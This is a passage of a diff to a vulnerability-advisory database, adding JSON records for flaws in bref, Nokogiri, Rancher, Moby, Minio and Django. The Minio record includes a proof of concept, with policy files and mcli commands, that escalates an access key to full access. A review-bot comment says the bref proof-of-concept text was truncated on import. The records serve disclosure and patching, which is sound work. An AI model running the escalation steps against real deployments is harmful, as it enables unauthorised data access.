filename=\"a.txt\"\nContent-Type: text/plain\n\ntest\n------WebKitFormBoundaryQqDeSZSSvmn2rfjb--\n```\n5. 
Notice that each time the request is sent the number of the uploaded temporary files on the disk increases.\n\n## Suggested Remediation\n\nDelete the temporary files after the request has been processed and the response have been generated.\n\n## References\n\n- https://cheatsheetseries.owasp.org/cheatsheets/Denial_of_Service_Cheat_Sheet.html", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "bref/bref" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.1.13" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/brefphp/bref/security/advisories/GHSA-x4hh-frx8-98r5" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24752" + }, + { + "type": "WEB", + "url": "https://github.com/brefphp/bref/commit/350788de12880b6fd64c4c318ba995388bec840e" + }, + { + "type": "PACKAGE", + "url": "https://github.com/brefphp/bref" + }, + { + "type": "WEB", + "url": "https://github.com/brefphp/bref/blob/2.1.12/src/Event/Http/Psr7Bridge.php#L94-L125" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-400" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-01T20:53:03Z", + "nvd_published_at": "2024-02-01T16:17:14Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-xc9x-jj77-9p9j/GHSA-xc9x-jj77-9p9j.json b/advisories/github-reviewed/2024/02/GHSA-xc9x-jj77-9p9j/GHSA-xc9x-jj77-9p9j.json new file mode 100644 index 0000000000000..12343e35adf61 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-xc9x-jj77-9p9j/GHSA-xc9x-jj77-9p9j.json 
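Review bot: The `details` string of GHSA-x4hh-frx8-98r5 has lost text in the PoC section: after "Create an `index.php` file with the following content:" the ```php fence is immediately followed by "` placeholder with the deployed Lambda domain", so the snippet, the rest of step 2 and steps 3–4 are gone and the request's `Host:` header is left empty — most likely angle-bracketed content (the PHP open tag, a `<domain>`-style placeholder) was stripped on import. As stored, the steps are incoherent for a reader, so the field should either be re-imported from the upstream advisory already linked in `references` or have the dangling fragment trimmed to end at the "Description"/"Impact" sections. The `CWE-400` tag and the MODERATE rating are consistent with the `A:H`-only vector.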
@@ -0,0 +1,70 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xc9x-jj77-9p9j", + "modified": "2024-02-05T20:22:56Z", + "published": "2024-02-05T20:22:56Z", + "aliases": [ + + ], + "summary": "Nokogiri update packaged libxml2 to v2.12.5 to resolve CVE-2024-25062", + "details": "## Summary\n\nNokogiri v1.16.2 upgrades the version of its dependency libxml2 to [v2.12.5](https://gitlab.gnome.org/GNOME/libxml2/-/releases/v2.12.5).\n\nlibxml2 v2.12.5 addresses the following vulnerability:\n\n- CVE-2024-25062 / https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-25062\n - described at https://gitlab.gnome.org/GNOME/libxml2/-/issues/604\n - patched by https://gitlab.gnome.org/GNOME/libxml2/-/commit/92721970\n\nPlease note that this advisory only applies to the CRuby implementation of Nokogiri `< 1.16.2`, and only if the _packaged_ libraries are being used. If you've overridden defaults at installation time to use _system_ libraries instead of packaged libraries, you should instead pay attention to your distro's `libxml2` release announcements.\n\n## Mitigation\n\nUpgrade to Nokogiri `>= 1.16.2`.\n\nUsers who are unable to upgrade Nokogiri may also choose a more complicated mitigation: compile and link Nokogiri against external libraries libxml2 `>= 2.12.5` which will also address these same issues.\n\n## Impact\n\nFrom the CVE description, this issue applies to the `xmlTextReader` module (which underlies `Nokogiri::XML::Reader`):\n\n> When using the XML Reader interface with DTD validation and XInclude expansion enabled, processing crafted XML documents can lead to an xmlValidatePopElement use-after-free.\n\n## Timeline\n\n- 2024-02-04 10:35 EST - this GHSA is drafted without complete details about when the upstream issue was introduced; a request is made of libxml2 maintainers for more detailed information\n- 2024-02-04 10:48 EST - updated GHSA to reflect libxml2 maintainers' confirmation of affected versions\n- 2024-02-04 11:54 EST - v1.16.2 published, this GHSA made 
public\n- 2024-02-05 10:18 EST - updated with MITRE link to the CVE information, and updated \"Impact\" section", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "RubyGems", + "name": "nokogiri" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.16.2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-xc9x-jj77-9p9j" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-25062" + }, + { + "type": "PACKAGE", + "url": "https://github.com/sparklemotion/nokogiri" + }, + { + "type": "WEB", + "url": "https://gitlab.gnome.org/GNOME/libxml2/-/commit/92721970" + }, + { + "type": "WEB", + "url": "https://gitlab.gnome.org/GNOME/libxml2/-/issues/604" + }, + { + "type": "WEB", + "url": "https://gitlab.gnome.org/GNOME/libxml2/-/releases/v2.12.5" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-416" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-05T20:22:56Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-xfj7-qf8w-2gcr/GHSA-xfj7-qf8w-2gcr.json b/advisories/github-reviewed/2024/02/GHSA-xfj7-qf8w-2gcr/GHSA-xfj7-qf8w-2gcr.json new file mode 100644 index 0000000000000..5e29594de6a34 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-xfj7-qf8w-2gcr/GHSA-xfj7-qf8w-2gcr.json 
@@ -0,0 +1,95 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xfj7-qf8w-2gcr", + "modified": "2024-02-08T18:44:25Z", + "published": "2024-02-08T18:44:25Z", + "aliases": [ + "CVE-2023-22649" + ], + "summary": "Rancher 'Audit Log' leaks sensitive information", + "details": "### Impact\n\nA vulnerability has been identified which may lead to sensitive data being leaked into Rancher's audit logs. [Rancher Audit Logging](https://ranchermanager.docs.rancher.com/how-to-guides/advanced-user-guides/enable-api-audit-log) is an opt-in feature, only deployments that have it enabled and have [AUDIT_LEVEL](https://ranchermanager.docs.rancher.com/how-to-guides/advanced-user-guides/enable-api-audit-log#audit-log-levels) set to `1 or above` are impacted by this issue.\n\nThe leaks might be caught in the audit logs upon these actions:\n\n- Creating cloud credentials or new authentication providers. It is crucial to note that **all** [authentication providers](https://ranchermanager.docs.rancher.com/pages-for-subheaders/authentication-config#external-vs-local-authentication) (such as AzureAD) and [cloud providers](https://ranchermanager.docs.rancher.com/pages-for-subheaders/set-up-cloud-providers) (such as Google) are impacted. 
\n- Downloading a kubeconfig file from a downstream or a local cluster.\n- Logging in/out from Rancher.\n\nThe affected data may include the following:\n\n- HTTP headers\n\nField | Location\n-- | --\nX-Api-Auth-Header | Request header\nX-Api-Set-Cookie-Header | Response header\nX-Amz-Security-Token | Request header\ncredentials | Request body\napplicationSecret | Request Body\noauthCredential | Request Body\nserviceAccountCredential | Request Body\nspKey | Request Body\nspCert | Request body\nspCert | Response body\ncertificate | Request body\nprivateKey | Request body\n \n- API Server calls returning `Secret` objects (including sub-types, such as `kubernetes.io/dockerconfigjson`).\n- Raw command lines used by agents to connect to the Rancher server which expose sensitive information (e.g. `register ... --token abc`).\n- `Kubeconfig` contents when the 'Download KubeConfig' feature is used in the Rancher UI.\n\nThe patched versions will redact the sensitive data, replacing it with `[redacted]`, making it safer for consumption. It is recommended that static secrets are rotated after the system is patched, to limit the potential impact of sensitive data being misused due to this vulnerability.\n\n**Note:**\n1. The severity of the vulnerability is intricately tied to the logging strategy employed. If logs are kept locally (default configuration), the impact is contained within the system, limiting the exposure.\nHowever, when logs are shipped to an external endpoint, the vulnerability's severity might increase, as resistance against leaks is contingent on the security measures implemented at the external log collector level.\n2. 
The final impact severity for confidentiality, integrity and availability is dependent on the permissions that the leaked credentials have on their own services.\n\n\n### Patches\nPatched versions include releases `2.6.14`, `2.7.10` and `2.8.2`.\n\n### Workarounds\nIf `AUDIT_LEVEL` `1 or above` is required and you cannot update to a patched Rancher version, ensure that the log is handled appropriately and it is not shared with other users or shipped into a log ingestion solution without the appropriate RBAC enforcement. Otherwise, disabling the Audit feature or decreasing it to the audit level `0`, mitigates the issue.\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n\n- Reach out to the [SUSE Rancher Security team](https://github.com/rancher/rancher/security/policy) for security related inquiries.\n- Open an issue in the [Rancher](https://github.com/rancher/rancher/issues/new/choose) repository.\n- Verify with our [support matrix](https://www.suse.com/suse-rancher/support-matrix/all-supported-versions/) and [product support lifecycle](https://www.suse.com/lifecycle/).\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/rancher/rancher" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.6.0" + }, + { + "fixed": "2.6.14" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/rancher/rancher" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.7.0" + }, + { + "fixed": "2.7.10" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/rancher/rancher" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.8.0" + }, + { + "fixed": "2.8.2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": 
"https://github.com/rancher/rancher/security/advisories/GHSA-xfj7-qf8w-2gcr" + }, + { + "type": "PACKAGE", + "url": "https://github.com/rancher/rancher" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-532" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-02-08T18:44:25Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-xw73-rw38-6vjc/GHSA-xw73-rw38-6vjc.json b/advisories/github-reviewed/2024/02/GHSA-xw73-rw38-6vjc/GHSA-xw73-rw38-6vjc.json new file mode 100644 index 0000000000000..3f4436750566e --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-xw73-rw38-6vjc/GHSA-xw73-rw38-6vjc.json 
@@ -0,0 +1,93 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xw73-rw38-6vjc", + "modified": "2024-02-01T20:51:19Z", + "published": "2024-02-01T20:51:19Z", + "aliases": [ + "CVE-2024-24557" + ], + "summary": "Moby vulnerable to classic builder cache poisoning", + "details": "The classic builder cache system is prone to cache poisoning if the image is built `FROM scratch`.\nAlso, changes to some instructions (most important being `HEALTHCHECK` and `ONBUILD`) would not cause a cache miss.\n\n\nAn attacker with the knowledge of the Dockerfile someone is using could poison their cache by making them pull a specially crafted image that would be considered as a valid cache candidate for some build steps.\n\nFor example, an attacker could create an image that is considered as a valid cache candidate for:\n```\nFROM scratch\nMAINTAINER Pawel\n```\n\nwhen in fact the malicious image used as a cache would be an image built from a different Dockerfile.\n\nIn the second case, the attacker could for example substitute a different `HEALTCHECK` command.\n\n\n### Impact\n\n23.0+ users are only affected if they explicitly opted out of Buildkit (`DOCKER_BUILDKIT=0` environment variable) or are using the `/build` API endpoint (which uses the classic builder by default).\n\nAll users on versions older than 23.0 could be impacted. An example could be a CI with a shared cache, or just a regular Docker user pulling a malicious image due to misspelling/typosquatting.\n\nImage build API endpoint (`/build`) and `ImageBuild` function from `github.com/docker/docker/client` is also affected as it the uses classic builder by default. 
\n\n\n### Patches\n\nPatches are included in Moby releases:\n\n- v25.0.2\n- v24.0.9\n\n### Workarounds\n\n- Use `--no-cache` or use Buildkit if possible (`DOCKER_BUILDKIT=1`, it's default on 23.0+ assuming that the buildx plugin is installed).\n- Use `Version = types.BuilderBuildKit` or `NoCache = true` in `ImageBuildOptions` for `ImageBuild` call.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:C/C:L/I:H/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/moby/moby" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "25.0.0" + }, + { + "fixed": "25.0.2" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/moby/moby" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "24.0.9" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/moby/moby/security/advisories/GHSA-xw73-rw38-6vjc" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24557" + }, + { + "type": "WEB", + "url": "https://github.com/moby/moby/commit/3e230cfdcc989dc524882f6579f9e0dac77400ae" + }, + { + "type": "WEB", + "url": "https://github.com/moby/moby/commit/fca702de7f71362c8d103073c7e4a1d0a467fadd" + }, + { + "type": "WEB", + "url": "https://github.com/moby/moby/commit/fce6e0ca9bc000888de3daa157af14fa41fcd0ff" + }, + { + "type": "PACKAGE", + "url": "https://github.com/moby/moby" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-345", + "CWE-346" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-01T20:51:19Z", + "nvd_published_at": "2024-02-01T17:15:10Z" + } +} \ No newline at end of file 
diff --git a/advisories/github-reviewed/2024/02/GHSA-xx8w-mq23-29g4/GHSA-xx8w-mq23-29g4.json b/advisories/github-reviewed/2024/02/GHSA-xx8w-mq23-29g4/GHSA-xx8w-mq23-29g4.json new file mode 100644 index 0000000000000..a5d859dbbc36b --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-xx8w-mq23-29g4/GHSA-xx8w-mq23-29g4.json 
@@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xx8w-mq23-29g4", + "modified": "2024-02-01T22:52:18Z", + "published": "2024-02-01T19:21:30Z", + "aliases": [ + "CVE-2024-24747" + ], + "summary": "Minio unsafe default: Access keys inherit `admin` of root user, allowing privilege escalation", + "details": "### Summary\nWhen someone creates an access key, it inherits the permissions of the parent key. Not only for \n`s3:*` actions, but also `admin:*` actions. Which means unless somewhere above in the \naccess-key hierarchy, the `admin` rights are denied, access keys will be able to simply \noverride their own `s3` permissions to something more permissive.\n\nCredit to @xSke for sort of accidentally discovering this. I only understood the implications.\n\n### Details / PoC\nWe spun up the latest version of minio in a docker container and signed in to the admin UI \nusing the minio root user. We created two buckets, `public` and `private` and created an \naccess key called `mycat` and attached the following policy to only allow access to the \nbucket called `public`.\n\n```json\n{\n \"Version\": \"2012-10-17\",\n \"Statement\": [\n {\n \"Effect\": \"Allow\",\n \"Action\": [\n \"s3:*\"\n ],\n \"Resource\": [\n \"arn:aws:s3:::public\",\n \"arn:aws:s3:::public/*\"\n ]\n }\n ]\n}\n```\nWe then set an alias in mc: `mcli alias set vuln http://localhost:9001 mycat mycatiscute` \n\nAnd checked whether policy works:\n```\nA ~/c/minio-vuln mcli ls vuln\n[0001-01-01 00:53:28 LMT] 0B public/\n```\nLooks good, we believe this is how 99% of users will work with access policies.\n\nIf I now create a file `full-access-policy.json`:\n```json\n{\n \"Version\": \"2012-10-17\",\n \"Statement\": [\n {\n \"Effect\": \"Allow\",\n \"Action\": [\n \"s3:*\"\n ],\n \"Resource\": [\n \"arn:aws:s3:::*\"\n ]\n }\n ]\n}\n```\nAnd then:\n\n```sh\nA ~/c/minio-vuln mcli admin user svcacct edit --policy full-access-policy.json vuln mycat\nEdited service account `mycat` 
successfully.\n```\n`mycat` has escalated its privileges to get access to the entire deployment: \n```sh\nA ~/c/minio-vuln mcli ls vuln\n[0001-01-01 00:53:28 LMT] 0B private/\n[0001-01-01 00:53:28 LMT] 0B public/\n```\n\n### Impact\nA trivial privilege escalation unless the operator fully understands that they need to \nexplicitly deny `admin` actions on access keys. \n\n### Patched\n\n```\ncommit 0ae4915a9391ef4b3ec80f5fcdcf24ee6884e776 (HEAD -> master, origin/master)\nAuthor: Aditya Manthramurthy \nDate: Wed Jan 31 10:56:45 2024 -0800\n\n fix: permission checks for editing access keys (#18928)\n \n With this change, only a user with `UpdateServiceAccountAdminAction`\n permission is able to edit access keys.\n \n We would like to let a user edit their own access keys, however the\n feature needs to be re-designed for better security and integration with\n external systems like AD/LDAP and OpenID.\n \n This change prevents privilege escalation via service accounts.\n```\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/minio/minio" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.0.0-20240131185645-0ae4915a9391" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/minio/minio/security/advisories/GHSA-xx8w-mq23-29g4" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24747" + }, + { + "type": "WEB", + "url": "https://github.com/minio/minio/commit/0ae4915a9391ef4b3ec80f5fcdcf24ee6884e776" + }, + { + "type": "PACKAGE", + "url": "https://github.com/minio/minio" + }, + { + "type": "WEB", + "url": "https://github.com/minio/minio/releases/tag/RELEASE.2024-01-31T20-20-33Z" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-269" + ], + "severity": "HIGH", + "github_reviewed": true, + 
"github_reviewed_at": "2024-02-01T19:21:30Z", + "nvd_published_at": "2024-01-31T22:15:54Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-xxj9-f6rv-m3x4/GHSA-xxj9-f6rv-m3x4.json b/advisories/github-reviewed/2024/02/GHSA-xxj9-f6rv-m3x4/GHSA-xxj9-f6rv-m3x4.json new file mode 100644 index 0000000000000..6a8902f3a6c13 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-xxj9-f6rv-m3x4/GHSA-xxj9-f6rv-m3x4.json 
@@ -0,0 +1,124 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xxj9-f6rv-m3x4", + "modified": "2024-02-07T17:32:14Z", + "published": "2024-02-07T00:30:25Z", + "aliases": [ + "CVE-2024-24680" + ], + "summary": "Django denial-of-service attack in the intcomma template filter", + "details": "An issue was discovered in Django 3.2 before 3.2.24, 4.2 before 4.2.10, and Django 5.0 before 5.0.2. The intcomma template filter was subject to a potential denial-of-service attack when used with very long strings.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "django" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.2.24" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "PyPI", + "name": "django" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.2" + }, + { + "fixed": "4.2.10" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "PyPI", + "name": "django" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "5.0" + }, + { + "fixed": "5.0.2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24680" + }, + { + "type": "WEB", + "url": "https://github.com/django/django/commit/16a8fe18a3b81250f4fa57e3f93f0599dc4895bc" + }, + { + "type": "WEB", + "url": "https://github.com/django/django/commit/55519d6cf8998fe4c8f5c8abffc2b10a7c3d14e9" + }, + { + "type": "WEB", + "url": "https://github.com/django/django/commit/572ea07e84b38ea8de0551f4b4eda685d91d09d2" + }, + { + "type": "WEB", + "url": "https://github.com/django/django/commit/c1171ffbd570db90ca206c30f8e2b9f691243820" + }, + { + "type": "WEB", + "url": "https://docs.djangoproject.com/en/5.0/releases/security/" + }, + { + "type": "PACKAGE", + "url": "https://github.com/django/django" + }, + { + "type": "WEB", + "url": 
"https://github.com/pypa/advisory-database/tree/main/vulns/django/PYSEC-2024-28.yaml" + }, + { + "type": "WEB", + "url": "https://groups.google.com/forum/#%21forum/django-announce" + }, + { + "type": "WEB", + "url": "https://www.djangoproject.com/weblog/2024/feb/06/security-releases/" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-07T17:32:14Z", + "nvd_published_at": "2024-02-06T22:16:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2021/11/GHSA-959p-vvwh-xj92/GHSA-959p-vvwh-xj92.json b/advisories/unreviewed/2021/11/GHSA-959p-vvwh-xj92/GHSA-959p-vvwh-xj92.json index d34ce6b8b68c5..969b228be0d54 100644 --- a/advisories/unreviewed/2021/11/GHSA-959p-vvwh-xj92/GHSA-959p-vvwh-xj92.json +++ b/advisories/unreviewed/2021/11/GHSA-959p-vvwh-xj92/GHSA-959p-vvwh-xj92.json @@ -21,6 +21,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-28708" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/I7ZGWVVRI4XY2XSTBI3XEMWBXPDVX6OT/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PXUI4VMD52CH3T7YXAG3J2JW7ZNN3SXF/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I7ZGWVVRI4XY2XSTBI3XEMWBXPDVX6OT/" @@ -29,6 +37,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PXUI4VMD52CH3T7YXAG3J2JW7ZNN3SXF/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-07" + }, { "type": "WEB", "url": "https://www.debian.org/security/2021/dsa-5017" 
diff --git a/advisories/unreviewed/2021/11/GHSA-gjrp-cpc9-h4r7/GHSA-gjrp-cpc9-h4r7.json b/advisories/unreviewed/2021/11/GHSA-gjrp-cpc9-h4r7/GHSA-gjrp-cpc9-h4r7.json index 4a412e8905dec..9579411f8385a 100644 --- a/advisories/unreviewed/2021/11/GHSA-gjrp-cpc9-h4r7/GHSA-gjrp-cpc9-h4r7.json +++ b/advisories/unreviewed/2021/11/GHSA-gjrp-cpc9-h4r7/GHSA-gjrp-cpc9-h4r7.json @@ -21,6 +21,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-28704" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/I7ZGWVVRI4XY2XSTBI3XEMWBXPDVX6OT/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PXUI4VMD52CH3T7YXAG3J2JW7ZNN3SXF/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I7ZGWVVRI4XY2XSTBI3XEMWBXPDVX6OT/" @@ -29,6 +37,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PXUI4VMD52CH3T7YXAG3J2JW7ZNN3SXF/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-07" + }, { "type": "WEB", "url": "https://www.debian.org/security/2021/dsa-5017" diff --git a/advisories/unreviewed/2021/11/GHSA-jpp8-232v-26fc/GHSA-jpp8-232v-26fc.json b/advisories/unreviewed/2021/11/GHSA-jpp8-232v-26fc/GHSA-jpp8-232v-26fc.json index 181312449e200..2f5d12aa40892 100644 --- a/advisories/unreviewed/2021/11/GHSA-jpp8-232v-26fc/GHSA-jpp8-232v-26fc.json +++ b/advisories/unreviewed/2021/11/GHSA-jpp8-232v-26fc/GHSA-jpp8-232v-26fc.json 
@@ -21,6 +21,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-28707" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/I7ZGWVVRI4XY2XSTBI3XEMWBXPDVX6OT/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PXUI4VMD52CH3T7YXAG3J2JW7ZNN3SXF/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I7ZGWVVRI4XY2XSTBI3XEMWBXPDVX6OT/" @@ -29,6 +37,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PXUI4VMD52CH3T7YXAG3J2JW7ZNN3SXF/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-07" + }, { "type": "WEB", "url": "https://www.debian.org/security/2021/dsa-5017" diff --git a/advisories/unreviewed/2021/12/GHSA-2rh7-96qm-4h8w/GHSA-2rh7-96qm-4h8w.json b/advisories/unreviewed/2021/12/GHSA-2rh7-96qm-4h8w/GHSA-2rh7-96qm-4h8w.json index 9f4931d29a10e..107adae14ce22 100644 --- a/advisories/unreviewed/2021/12/GHSA-2rh7-96qm-4h8w/GHSA-2rh7-96qm-4h8w.json +++ b/advisories/unreviewed/2021/12/GHSA-2rh7-96qm-4h8w/GHSA-2rh7-96qm-4h8w.json @@ -24,11 +24,16 @@ { "type": "WEB", "url": "https://bugs.chromium.org/p/aomedia/issues/detail?id=2914" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-32" } ], "database_specific": { "cwe_ids": [ - "CWE-119" + "CWE-119", + "CWE-125" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2021/12/GHSA-3mrv-v95f-r4rx/GHSA-3mrv-v95f-r4rx.json b/advisories/unreviewed/2021/12/GHSA-3mrv-v95f-r4rx/GHSA-3mrv-v95f-r4rx.json index 1f3d8aa47614f..653a26febe911 100644 --- a/advisories/unreviewed/2021/12/GHSA-3mrv-v95f-r4rx/GHSA-3mrv-v95f-r4rx.json +++ b/advisories/unreviewed/2021/12/GHSA-3mrv-v95f-r4rx/GHSA-3mrv-v95f-r4rx.json 
@@ -29,6 +29,10 @@ "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/09/msg00003.html" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-32" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5490" diff --git a/advisories/unreviewed/2021/12/GHSA-cw3p-3434-gw6r/GHSA-cw3p-3434-gw6r.json b/advisories/unreviewed/2021/12/GHSA-cw3p-3434-gw6r/GHSA-cw3p-3434-gw6r.json index aacb7ea33f389..91a1f545a9309 100644 --- a/advisories/unreviewed/2021/12/GHSA-cw3p-3434-gw6r/GHSA-cw3p-3434-gw6r.json +++ b/advisories/unreviewed/2021/12/GHSA-cw3p-3434-gw6r/GHSA-cw3p-3434-gw6r.json @@ -29,6 +29,10 @@ "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/09/msg00003.html" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-32" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5490" diff --git a/advisories/unreviewed/2021/12/GHSA-g8f8-rq6r-4rrh/GHSA-g8f8-rq6r-4rrh.json b/advisories/unreviewed/2021/12/GHSA-g8f8-rq6r-4rrh/GHSA-g8f8-rq6r-4rrh.json index faa5e67dc436b..73c5a1b3c65e2 100644 --- a/advisories/unreviewed/2021/12/GHSA-g8f8-rq6r-4rrh/GHSA-g8f8-rq6r-4rrh.json +++ b/advisories/unreviewed/2021/12/GHSA-g8f8-rq6r-4rrh/GHSA-g8f8-rq6r-4rrh.json @@ -29,6 +29,10 @@ "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/09/msg00003.html" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-32" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5490" diff --git a/advisories/unreviewed/2021/12/GHSA-mj29-93c5-p3pr/GHSA-mj29-93c5-p3pr.json b/advisories/unreviewed/2021/12/GHSA-mj29-93c5-p3pr/GHSA-mj29-93c5-p3pr.json index 46bdd5a26534c..8df856483bb45 100644 --- a/advisories/unreviewed/2021/12/GHSA-mj29-93c5-p3pr/GHSA-mj29-93c5-p3pr.json +++ b/advisories/unreviewed/2021/12/GHSA-mj29-93c5-p3pr/GHSA-mj29-93c5-p3pr.json 
